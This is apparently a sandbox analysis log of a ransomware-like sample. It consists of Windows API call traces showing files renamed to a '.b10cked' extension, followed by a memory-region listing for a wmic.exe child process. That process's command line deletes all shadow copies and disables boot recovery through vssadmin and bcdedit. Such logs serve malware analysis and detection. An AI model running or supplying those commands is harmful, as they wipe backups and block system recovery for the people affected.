lpFilePart=0x12f0c8*="VISBRRES.DLL.trx_dll.b10cked") returned 0x4c [0159.880] SetErrorMode (uMode=0x0) returned 0x1 [0159.880] SetLastError (dwErrCode=0x0) [0159.880] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll.b10cked")) returned 0xffffffff [0159.880] GetLastError () returned 0x2 [0159.880] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x12ea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ea44) returned 0x332130 [0159.881] FindNextFileW (in: hFindFile=0x332130, lpFindFileData=0x12ea44 | out: lpFindFileData=0x12ea44) returned 0 [0159.881] GetLastError () returned 0x12 [0159.881] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0159.883] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRR~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x331cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331cc0) returned 0x332130 [0159.883] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0159.883] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x12ecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0159.883] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll")) returned 0x2020 [0159.884] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISBRRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visbrres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0159.885] FindClose (in: hFindFile=0x332130 | out: hFindFile=0x332130) returned 1 [0159.885] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12ec90 | out: _Buffer=" 1") returned 9 [0159.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.885] GetFileType (hFile=0x7) returned 0x2 [0159.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0159.885] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ec1c | out: lpMode=0x12ec1c) returned 1 [0159.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.885] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ec50 | out: lpConsoleScreenBufferInfo=0x12ec50) returned 1 [0159.885] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0159.886] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0159.886] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12ec74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec74*=0x1a) returned 1 [0159.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.886] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.886] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.887] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.887] SetConsoleInputExeNameW () returned 0x1 [0159.887] GetConsoleOutputCP () returned 0x1b5 [0159.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.887] exit (_Code=0) Process: id = "271" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7ea16ce0" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "wmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22031 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22032 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22033 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22034 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22035 start_va = 0x870000 end_va = 0x8d2fff entry_point = 0x870000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe") Region: id = 22036 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22037 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22038 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22039 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22040 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22065 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22066 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22067 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22068 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 22069 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 22070 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 22071 start_va = 0x6f920000 end_va = 0x6f954fff entry_point = 0x6f920000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 22072 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 22073 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 22074 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 22075 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 22076 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 22077 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22078 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 22079 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 22080 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22081 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 22082 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22083 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 22084 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22085 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22086 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 22087 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22088 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 22089 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 22090 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 22091 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22092 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22093 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22094 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22120 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22121 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22122 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x70000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui") Region: id = 22123 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22124 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 22125 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 22126 start_va = 0x8e0000 end_va = 0x14dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 22156 start_va = 0x150000 end_va = 0x1abfff entry_point = 0x150000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 22157 start_va = 0x150000 end_va = 0x1abfff entry_point = 0x150000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 22158 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 22159 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 22160 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22161 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 22162 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 22163 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 22164 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 22165 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 22166 start_va = 0x590000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 22167 start_va = 0x14e0000 end_va = 0x17aefff entry_point = 0x14e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 22217 start_va = 0x6c000000 end_va = 0x6c132fff entry_point = 0x6c000000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 22351 start_va = 0x590000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 22352 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 22353 start_va = 0x3c0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22354 start_va = 0x17b0000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 22355 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22356 start_va = 0x17b0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 22357 start_va = 0x1900000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 22358 start_va = 0x1940000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 22359 start_va = 0x1af0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 22370 start_va = 0x590000 end_va = 0x64ffff entry_point = 0x590000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 22371 start_va = 0x670000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 22372 start_va = 0x1cb0000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 22498 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x3c0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 22499 start_va = 0x410000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 22628 start_va = 0x3d0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 22634 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 22640 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 22641 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 22642 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 22653 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 22654 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 22679 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 22680 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 22681 start_va = 0x400000 end_va = 0x400fff entry_point = 0x400000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 22682 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 22683 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 22684 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 22685 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 22686 start_va = 0x6b0000 end_va = 0x6dbfff entry_point = 0x6b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 22702 start_va = 0x460000 end_va = 0x467fff entry_point = 0x460000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 22703 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x650000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 22746 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 22747 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 22748 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 22749 start_va = 0x1940000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 22750 start_va = 0x1ab0000 end_va = 0x1aeffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 22751 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 22752 start_va = 0x20b0000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 22779 start_va = 0x17b0000 end_va = 0x188efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017b0000" filename = "" Region: id = 22780 start_va = 0x18a0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 22781 start_va = 0x1af0000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 22782 start_va = 0x1c70000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 22783 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 22784 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 22785 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22786 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22787 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22788 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22789 start_va = 0x6e0000 end_va = 0x71bfff entry_point = 0x6e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22790 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 22791 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 22962 start_va = 0x1950000 end_va = 0x198ffff entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 22963 start_va = 0x19a0000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 22964 start_va = 0x1a00000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 22965 start_va = 0x1bf0000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 22966 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22967 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 22968 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 22979 start_va = 0x660000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 22980 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: 